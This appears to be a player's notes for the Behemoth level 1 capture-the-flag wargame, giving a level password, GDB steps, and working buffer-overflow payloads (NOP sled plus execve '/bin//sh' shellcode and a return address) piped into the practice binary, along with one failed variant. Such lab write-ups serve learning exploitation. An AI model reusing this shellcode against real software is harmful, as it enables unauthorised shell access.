pass: aesebootiv

# GDB
gdb -q /behemoth/behemoth1
break *0x8048467
run <<< $(python -c "print '\x90' * 39 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80' + 'aaaa' + '\xa0\xd6\xff\xff'")

# Normal
(python -c "print '\x90' * 39 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80' + 'aaaa' + '\xa0\xd6\xff\xff'"; cat) | /behemoth/behemoth1



https://stackoverflow.com/questions/19984562/shellcode-segfaults-after-nop-sled
A good reference to understand why the following did not work.
(python -c "print '\x90' * 43 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80' + '\xa0\xd6\xff\xff'"; cat) | /behemoth/behemoth1